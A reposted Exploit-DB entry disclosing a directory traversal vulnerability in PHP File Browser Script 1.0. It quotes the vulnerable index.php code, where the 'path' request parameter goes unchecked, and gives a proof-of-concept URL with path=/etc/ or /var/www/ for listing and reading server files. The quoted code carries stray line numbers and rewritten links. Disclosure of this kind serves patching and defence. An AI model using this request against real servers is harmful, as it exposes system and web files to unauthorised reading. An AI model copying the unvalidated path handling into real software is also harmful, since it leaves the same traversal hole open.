PHP File Browser Script 1 – Directory Traversal - 体验盒子

作者： AkkuS

日期： 2018-09-04

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/45327/

# Exploit Title: PHP File Browser Script 1 - Directory Traversal
# Dork: N/A
# Date: 2018-09-03
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://www.hscripts.com/scripts/php/file-browser.php
# Software Link:https://www.hscripts.com/scripts/php/downloads/file-browser-demo.zip
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
# Description : The "index.php" is vulnerable to directory traversal.
# An attacker can see and read all files known by the name

# Vulnerable File: index.php
<?php // line 45

72$script = basename(__FILE__); // the name of this script
73$path = !empty($_REQUEST['path']) ? $_REQUEST['path'] : "demo"; // the path the script should access
74
75if($loc!=''){
76echo "<p id='bloc'><b>Browsing Location: </b><a href='https://www.exploit-db.com/exploits/45327/index.php'><b>".ucfirst($loc1)."</b></a>
77<a href='https://www.exploit-db.com/exploits/45327/$script?path=$rpath/$loc1/$loc2'><b>".ucfirst($locdem2)."</b></a>
78<a href='https://www.exploit-db.com/exploits/45327/'><b>".ucfirst($locdem3)."</b></a></p>";}
79else{
80echo "<p id='bloc'><b>Browsing Location: </b><a href='https://www.exploit-db.com/exploits/45327/'><b>Demo</b></a></p>";

?> // line 151

# PoC :

https://Target/scripts/php/file-browser-demo/index.php?path=[DirectoryName]

# You can write the known directory name instead of [DirectoryName].
# Example: '/etc/' or '/var/www/'
# https://Target/scripts/php/file-browser-demo/index.php?path=/etc/